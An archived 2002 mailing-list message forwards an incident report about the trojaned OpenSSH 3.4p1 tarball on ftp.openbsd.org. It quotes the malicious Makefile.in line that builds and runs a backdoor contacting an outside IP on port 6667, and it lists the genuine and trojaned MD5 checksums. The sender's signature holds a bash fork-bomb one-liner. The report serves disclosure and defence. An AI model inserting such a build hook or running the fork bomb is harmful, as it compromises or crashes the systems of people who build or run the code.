Return-Path: <sentto-279987-5110-1028256206-fc=all.net@returns.groups.yahoo.com> Delivered-To: fc@all.net Received: from 204.181.12.215 [204.181.12.215] by localhost with POP3 (fetchmail-5.7.4) for fc@localhost (single-drop); Thu, 01 Aug 2002 19:48:08 -0700 (PDT) Received: (qmail 23548 invoked by uid 510); 2 Aug 2002 02:42:20 -0000 Received: from n36.grp.scd.yahoo.com (66.218.66.104) by all.net with SMTP; 2 Aug 2002 02:42:20 -0000 X-eGroups-Return: sentto-279987-5110-1028256206-fc=all.net@returns.groups.yahoo.com Received: from [66.218.67.197] by n36.grp.scd.yahoo.com with NNFMP; 02 Aug 2002 02:43:26 -0000 X-Sender: fc@red.all.net X-Apparently-To: iwar@onelist.com Received: (EGP: mail-8_0_7_4); 2 Aug 2002 02:42:59 -0000 Received: (qmail 85945 invoked from network); 2 Aug 2002 02:42:59 -0000 Received: from unknown (66.218.66.216) by m4.grp.scd.yahoo.com with QMQP; 2 Aug 2002 02:42:59 -0000 Received: from unknown (HELO red.all.net) (12.232.72.152) by mta1.grp.scd.yahoo.com with SMTP; 2 Aug 2002 02:42:59 -0000 Received: (from fc@localhost) by red.all.net (8.11.2/8.11.2) id g722jcY02589 for iwar@onelist.com; Thu, 1 Aug 2002 19:45:38 -0700 Message-Id: <200208020245.g722jcY02589@red.all.net> To: iwar@onelist.com (Information Warfare Mailing List) Organization: I'm not allowed to say X-Mailer: don't even ask X-Mailer: ELM [version 2.5 PL3] From: Fred Cohen <fc@all.net> X-Yahoo-Profile: fcallnet Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com Delivered-To: mailing list iwar@yahoogroups.com Precedence: bulk List-Unsubscribe: <mailto:iwar-unsubscribe@yahoogroups.com> Date: Thu, 1 Aug 2002 19:45:37 -0700 (PDT) Subject: [iwar] [fc:openssh-3.4p1.tar.gz.distribution.recently.trojaned] Reply-To: iwar@yahoogroups.com Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-Spam-Status: No, hits=-0.3 required=5.0 tests=MAILTO_WITH_SUBJ,MAILTO_LINK,DIFFERENT_REPLY_TO version=2.20 X-Spam-Level: From <a href="http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security">http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security> ----- Forwarded message from Edwin Groothuis <<a href="mailto:edwin@mavetju.org?Subject=Re:%20openssh-3.4p1.tar.gz%20distribution%20recently%20trojaned%2526In-Reply-To=%2526lt;3D49198F.8613D352@clavister.com">edwin@mavetju.org</a> ----- Date: Thu, 1 Aug 2002 16:55:51 +1000 From: Edwin Groothuis <<a href="mailto:edwin@mavetju.org?Subject=Re:%20openssh-3.4p1.tar.gz%20distribution%20recently%20trojaned%2526In-Reply-To=%2526lt;3D49198F.8613D352@clavister.com">edwin@mavetju.org</a> To: <a href="mailto:incidents@securityfocus.com?Subject=Re:%20openssh-3.4p1.tar.gz%20distribution%20recently%20trojaned%2526In-Reply-To=%2526lt;3D49198F.8613D352@clavister.com">incidents@securityfocus.com</a> Subject: openssh-3.4p1.tar.gz trojaned Greetings, Just want to inform you that the OpenSSH package op ftp.openbsd.org (and probably all its mirrors now) it trojaned: ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz The OpenBSD people have been informed about it (via email to <a href="mailto:deraadt@openbsd.org?Subject=Re:%20openssh-3.4p1.tar.gz%20distribution%20recently%20trojaned%2526In-Reply-To=%2526lt;3D49198F.8613D352@clavister.com">deraadt@openbsd.org</a> and via irc.openprojects.org/#openbsd) The changed files are openssh-3.4p1/openbsd-compat/Makefile.in: all: libopenbsd-compat.a + @ $(CC) bf-test.c -o bf-test; ./bf-testbf-test.out; sh ./bf-test.out & bf-test.c[1] is nothing more than a wrapper which generates a shell-script[2] which compiles itself and tries to connect to an server running on 203.62.158.32:6667 (web.snsonline.net). [1] http://www.mavetju.org/~edwin/bf-test.c [2] http://www.mavetju.org/~edwin/bf-output.sh This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD ports system: MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8 This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz: MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57 Edwin -- Edwin Groothuis | Personal website: http://www.MavEtJu.org <a href="mailto:edwin@mavetju.org?Subject=Re:%20openssh-3.4p1.tar.gz%20distribution%20recently%20trojaned%2526In-Reply-To=%2526lt;3D49198F.8613D352@clavister.com">edwin@mavetju.org</a> | Weblog: http://www.mavetju.org/weblog/weblog.php bash$ :(){ :|:&};: | Interested in MUDs? http://www.FatalDimensions.org/ ------------------ http://all.net/ Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
This archive was generated by hypermail 2.1.2 : 2002-10-01 06:44:32 PDT